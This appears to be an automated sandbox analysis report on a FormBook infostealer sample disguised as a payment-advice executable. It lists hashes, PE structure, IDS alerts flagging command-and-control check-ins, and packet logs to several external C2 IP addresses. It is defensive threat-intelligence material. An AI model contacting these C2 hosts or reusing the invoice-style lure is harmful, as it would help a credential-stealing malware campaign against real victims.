                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):60
                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                          Entropy (8bit):7.803865417465839
                                                                                                                                          TrID:
                                                                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                          • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                          File name:Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe
                                                                                                                                          File size:734'208 bytes
                                                                                                                                          MD5:cedbf1d5c1bc7d923f885cd24bf225c1
                                                                                                                                          SHA1:dd0e1b5cd5b14488e1f28ad127d5cd5e484a5ba2
                                                                                                                                          SHA256:58b21b1ecb14e234c09d14eb1a987f636f384ff0e1345bde2071bb87e90ae5d8
                                                                                                                                          SHA512:78a3a9bdfa2feba43bc900f829d696734b4f82fa529d4243a84e6bf562aa5c6f2b371911e744066e509242f163f32b2825918033143818cd6d9e520a5f874ebb
                                                                                                                                          SSDEEP:12288:0PGgmhOG+VQMVk/25m5TLR/O5zZZOPG2HckSRd7LL0pJKFIA:Mj3VXC25QT9/O5zfOLk7LLBn
                                                                                                                                          TLSH:8CF412A96686D907C99557380BB2F1B916B90EDDF801D2039FDD7DEBFC76E190C88082
                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...._Rg..............0.............^;... ...@....@.. ....................................@................................
                                                                                                                                          Icon Hash:04852062591b5659
                                                                                                                                          Entrypoint:0x4b3b5e
                                                                                                                                          Entrypoint Section:.text
                                                                                                                                          Digitally signed:false
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          Subsystem:windows gui
                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                          Time Stamp:0x67525F04 [Fri Dec 6 02:18:44 2024 UTC]
                                                                                                                                          TLS Callbacks:
                                                                                                                                          CLR (.Net) Version:
                                                                                                                                          OS Version Major:4
                                                                                                                                          OS Version Minor:0
                                                                                                                                          File Version Major:4
                                                                                                                                          File Version Minor:0
                                                                                                                                          Subsystem Version Major:4
                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                          Instruction
                                                                                                                                          jmp dword ptr [00402000h]
                                                                                                                                          push ebx
                                                                                                                                          add byte ptr [ecx+00h], bh
                                                                                                                                          jnc 00007FC5152B1382h
                                                                                                                                          je 00007FC5152B1382h
                                                                                                                                          add byte ptr [ebp+00h], ch
                                                                                                                                          add byte ptr [ecx+00h], al
                                                                                                                                          arpl word ptr [eax], ax
                                                                                                                                          je 00007FC5152B1382h
                                                                                                                                          imul eax, dword ptr [eax], 00610076h
                                                                                                                                          je 00007FC5152B1382h
                                                                                                                                          outsd
                                                                                                                                          add byte ptr [edx+00h], dh
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xb3b0c0x4f.text
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xb40000x13bc.rsrc
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xb60000xc.reloc
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                          .text0x20000xb1b840xb1c00b30dc75902bd2287d426f271d9d4ac39False0.9361361089135021data7.810640968604701IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                          .rsrc0xb40000x13bc0x140014dcdecc73cecd8a588933840ae8051aFalse0.7326171875data6.944408595177701IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                          .reloc0xb60000xc0x20092d9ef896f96697ec23b9542b942e77fFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                          RT_ICON0xb41000xd91PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.8692772818888569
                                                                                                                                          RT_GROUP_ICON0xb4ea40x14data1.05
                                                                                                                                          RT_VERSION0xb4ec80x2f4data0.43253968253968256
                                                                                                                                          RT_MANIFEST0xb51cc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                                                                          DLLImport
                                                                                                                                          mscoree.dll_CorExeMain
                                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                          2024-12-09T08:49:05.514764+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449768172.247.112.16480TCP
                                                                                                                                          2024-12-09T08:49:30.831726+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44983013.248.169.4880TCP
                                                                                                                                          2024-12-09T08:49:46.022760+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449868156.253.8.11580TCP
                                                                                                                                          2024-12-09T08:50:02.120683+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44990837.97.254.2780TCP
                                                                                                                                          2024-12-09T08:50:17.301606+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449947199.193.6.13480TCP
                                                                                                                                          2024-12-09T08:50:34.231659+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449990149.104.34.13480TCP
                                                                                                                                          2024-12-09T08:50:49.794564+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450029124.6.61.13080TCP
                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                          Dec 9, 2024 08:49:04.286844015 CET4976880192.168.2.4172.247.112.164
                                                                                                                                          Dec 9, 2024 08:49:04.406299114 CET8049768172.247.112.164192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:04.406429052 CET4976880192.168.2.4172.247.112.164
                                                                                                                                          Dec 9, 2024 08:49:04.416198969 CET4976880192.168.2.4172.247.112.164
                                                                                                                                          Dec 9, 2024 08:49:04.535537958 CET8049768172.247.112.164192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:05.514425993 CET8049768172.247.112.164192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:05.514453888 CET8049768172.247.112.164192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:05.514764071 CET4976880192.168.2.4172.247.112.164
                                                                                                                                          Dec 9, 2024 08:49:05.518685102 CET4976880192.168.2.4172.247.112.164
                                                                                                                                          Dec 9, 2024 08:49:05.638247967 CET8049768172.247.112.164192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:21.609409094 CET4980880192.168.2.413.248.169.48
                                                                                                                                          Dec 9, 2024 08:49:21.729734898 CET804980813.248.169.48192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:21.729847908 CET4980880192.168.2.413.248.169.48
                                                                                                                                          Dec 9, 2024 08:49:21.744632959 CET4980880192.168.2.413.248.169.48
                                                                                                                                          Dec 9, 2024 08:49:21.863955021 CET804980813.248.169.48192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:22.830460072 CET804980813.248.169.48192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:22.830492020 CET804980813.248.169.48192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:22.830663919 CET4980880192.168.2.413.248.169.48
                                                                                                                                          Dec 9, 2024 08:49:23.254048109 CET4980880192.168.2.413.248.169.48
                                                                                                                                          Dec 9, 2024 08:49:24.273236990 CET4981480192.168.2.413.248.169.48
                                                                                                                                          Dec 9, 2024 08:49:24.397138119 CET804981413.248.169.48192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:24.397382021 CET4981480192.168.2.413.248.169.48
                                                                                                                                          Dec 9, 2024 08:49:24.412184954 CET4981480192.168.2.413.248.169.48
                                                                                                                                          Dec 9, 2024 08:49:24.531564951 CET804981413.248.169.48192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:25.493840933 CET804981413.248.169.48192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:25.493916988 CET804981413.248.169.48192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:25.493973017 CET4981480192.168.2.413.248.169.48
                                                                                                                                          Dec 9, 2024 08:49:25.925889015 CET4981480192.168.2.413.248.169.48
                                                                                                                                          Dec 9, 2024 08:49:26.944463968 CET4982480192.168.2.413.248.169.48
                                                                                                                                          Dec 9, 2024 08:49:27.063940048 CET804982413.248.169.48192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:27.064022064 CET4982480192.168.2.413.248.169.48
                                                                                                                                          Dec 9, 2024 08:49:27.080014944 CET4982480192.168.2.413.248.169.48
                                                                                                                                          Dec 9, 2024 08:49:27.199582100 CET804982413.248.169.48192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:27.199645996 CET804982413.248.169.48192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:27.199700117 CET804982413.248.169.48192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:27.199729919 CET804982413.248.169.48192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:27.199771881 CET804982413.248.169.48192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:27.199839115 CET804982413.248.169.48192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:27.199872017 CET804982413.248.169.48192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:27.199965000 CET804982413.248.169.48192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:27.200023890 CET804982413.248.169.48192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:28.164472103 CET804982413.248.169.48192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:28.164535046 CET804982413.248.169.48192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:28.164613962 CET4982480192.168.2.413.248.169.48
                                                                                                                                          Dec 9, 2024 08:49:28.582174063 CET4982480192.168.2.413.248.169.48
                                                                                                                                          Dec 9, 2024 08:49:29.601253033 CET4983080192.168.2.413.248.169.48
                                                                                                                                          Dec 9, 2024 08:49:29.721705914 CET804983013.248.169.48192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:29.721884966 CET4983080192.168.2.413.248.169.48
                                                                                                                                          Dec 9, 2024 08:49:29.731131077 CET4983080192.168.2.413.248.169.48
                                                                                                                                          Dec 9, 2024 08:49:29.850366116 CET804983013.248.169.48192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:30.831568956 CET804983013.248.169.48192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:30.831588030 CET804983013.248.169.48192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:30.831726074 CET4983080192.168.2.413.248.169.48
                                                                                                                                          Dec 9, 2024 08:49:30.834527969 CET4983080192.168.2.413.248.169.48
                                                                                                                                          Dec 9, 2024 08:49:30.953938961 CET804983013.248.169.48192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:36.294364929 CET4984680192.168.2.4156.253.8.115
                                                                                                                                          Dec 9, 2024 08:49:36.413695097 CET8049846156.253.8.115192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:36.413784981 CET4984680192.168.2.4156.253.8.115
                                                                                                                                          Dec 9, 2024 08:49:36.428558111 CET4984680192.168.2.4156.253.8.115
                                                                                                                                          Dec 9, 2024 08:49:36.547847033 CET8049846156.253.8.115192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:37.941440105 CET4984680192.168.2.4156.253.8.115
                                                                                                                                          Dec 9, 2024 08:49:38.009567976 CET8049846156.253.8.115192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:38.009666920 CET8049846156.253.8.115192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:38.009684086 CET4984680192.168.2.4156.253.8.115
                                                                                                                                          Dec 9, 2024 08:49:38.009726048 CET4984680192.168.2.4156.253.8.115
                                                                                                                                          Dec 9, 2024 08:49:38.060827971 CET8049846156.253.8.115192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:38.060884953 CET4984680192.168.2.4156.253.8.115
                                                                                                                                          Dec 9, 2024 08:49:38.960129023 CET4985380192.168.2.4156.253.8.115
                                                                                                                                          Dec 9, 2024 08:49:39.079447031 CET8049853156.253.8.115192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:39.079629898 CET4985380192.168.2.4156.253.8.115
                                                                                                                                          Dec 9, 2024 08:49:39.099911928 CET4985380192.168.2.4156.253.8.115
                                                                                                                                          Dec 9, 2024 08:49:39.219280958 CET8049853156.253.8.115192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:40.613347054 CET4985380192.168.2.4156.253.8.115
                                                                                                                                          Dec 9, 2024 08:49:40.675672054 CET8049853156.253.8.115192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:40.675702095 CET8049853156.253.8.115192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:40.675863981 CET4985380192.168.2.4156.253.8.115
                                                                                                                                          Dec 9, 2024 08:49:40.675908089 CET4985380192.168.2.4156.253.8.115
                                                                                                                                          Dec 9, 2024 08:49:40.732649088 CET8049853156.253.8.115192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:40.732775927 CET4985380192.168.2.4156.253.8.115
                                                                                                                                          Dec 9, 2024 08:49:41.632496119 CET4986180192.168.2.4156.253.8.115
                                                                                                                                          Dec 9, 2024 08:49:41.751898050 CET8049861156.253.8.115192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:41.753957033 CET4986180192.168.2.4156.253.8.115
                                                                                                                                          Dec 9, 2024 08:49:41.769617081 CET4986180192.168.2.4156.253.8.115
                                                                                                                                          Dec 9, 2024 08:49:41.889074087 CET8049861156.253.8.115192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:41.889091015 CET8049861156.253.8.115192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:41.889108896 CET8049861156.253.8.115192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:41.889125109 CET8049861156.253.8.115192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:41.889143944 CET8049861156.253.8.115192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:41.889293909 CET8049861156.253.8.115192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:41.889303923 CET8049861156.253.8.115192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:41.889322996 CET8049861156.253.8.115192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:41.889377117 CET8049861156.253.8.115192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:43.285298109 CET4986180192.168.2.4156.253.8.115
                                                                                                                                          Dec 9, 2024 08:49:43.404917002 CET8049861156.253.8.115192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:43.405057907 CET4986180192.168.2.4156.253.8.115
                                                                                                                                          Dec 9, 2024 08:49:44.303843021 CET4986880192.168.2.4156.253.8.115
                                                                                                                                          Dec 9, 2024 08:49:44.423290014 CET8049868156.253.8.115192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:44.423520088 CET4986880192.168.2.4156.253.8.115
                                                                                                                                          Dec 9, 2024 08:49:44.432776928 CET4986880192.168.2.4156.253.8.115
                                                                                                                                          Dec 9, 2024 08:49:44.552242994 CET8049868156.253.8.115192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:46.022469997 CET8049868156.253.8.115192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:46.022488117 CET8049868156.253.8.115192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:46.022759914 CET4986880192.168.2.4156.253.8.115
                                                                                                                                          Dec 9, 2024 08:49:46.030134916 CET4986880192.168.2.4156.253.8.115
                                                                                                                                          Dec 9, 2024 08:49:46.149336100 CET8049868156.253.8.115192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:52.778182983 CET4988980192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:49:52.897448063 CET804988937.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:52.897557974 CET4988980192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:49:52.912126064 CET4988980192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:49:53.031461000 CET804988937.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:54.140669107 CET804988937.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:54.140805960 CET804988937.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:54.140857935 CET4988980192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:49:54.425960064 CET4988980192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:49:55.444632053 CET4989580192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:49:55.564035892 CET804989537.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:55.564212084 CET4989580192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:49:55.578536034 CET4989580192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:49:55.697932005 CET804989537.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:56.801865101 CET804989537.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:56.802010059 CET804989537.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:56.802073002 CET4989580192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:49:57.082206011 CET4989580192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:49:58.100857973 CET4990180192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:49:58.220328093 CET804990137.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:58.220618963 CET4990180192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:49:58.235910892 CET4990180192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:49:58.355429888 CET804990137.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:58.355468035 CET804990137.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:58.355488062 CET804990137.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:58.355561018 CET804990137.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:58.355612993 CET804990137.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:58.355622053 CET804990137.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:58.355624914 CET804990137.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:58.355643034 CET804990137.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:58.355705023 CET804990137.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:59.457586050 CET804990137.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:59.457652092 CET804990137.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:59.457807064 CET4990180192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:49:59.742111921 CET4990180192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:50:00.757173061 CET4990880192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:50:00.876471043 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:00.876591921 CET4990880192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:50:00.885998964 CET4990880192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:50:01.005304098 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.120342016 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.120445013 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.120457888 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.120682955 CET4990880192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:50:02.120909929 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.120923042 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.120934010 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.120946884 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.121033907 CET4990880192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:50:02.121757030 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.121768951 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.121782064 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.121823072 CET4990880192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:50:02.240055084 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.240099907 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.240206957 CET4990880192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:50:02.312591076 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.312638044 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.312730074 CET4990880192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:50:02.316723108 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.316801071 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.316852093 CET4990880192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:50:02.325076103 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.325181961 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.325227976 CET4990880192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:50:02.333451986 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.333564997 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.333610058 CET4990880192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:50:02.341780901 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.341929913 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.341976881 CET4990880192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:50:02.350172997 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.350284100 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.350326061 CET4990880192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:50:02.358541965 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.358601093 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.358653069 CET4990880192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:50:02.366859913 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.366952896 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.366998911 CET4990880192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:50:02.375225067 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.375333071 CET804990837.97.254.27192.168.2.4
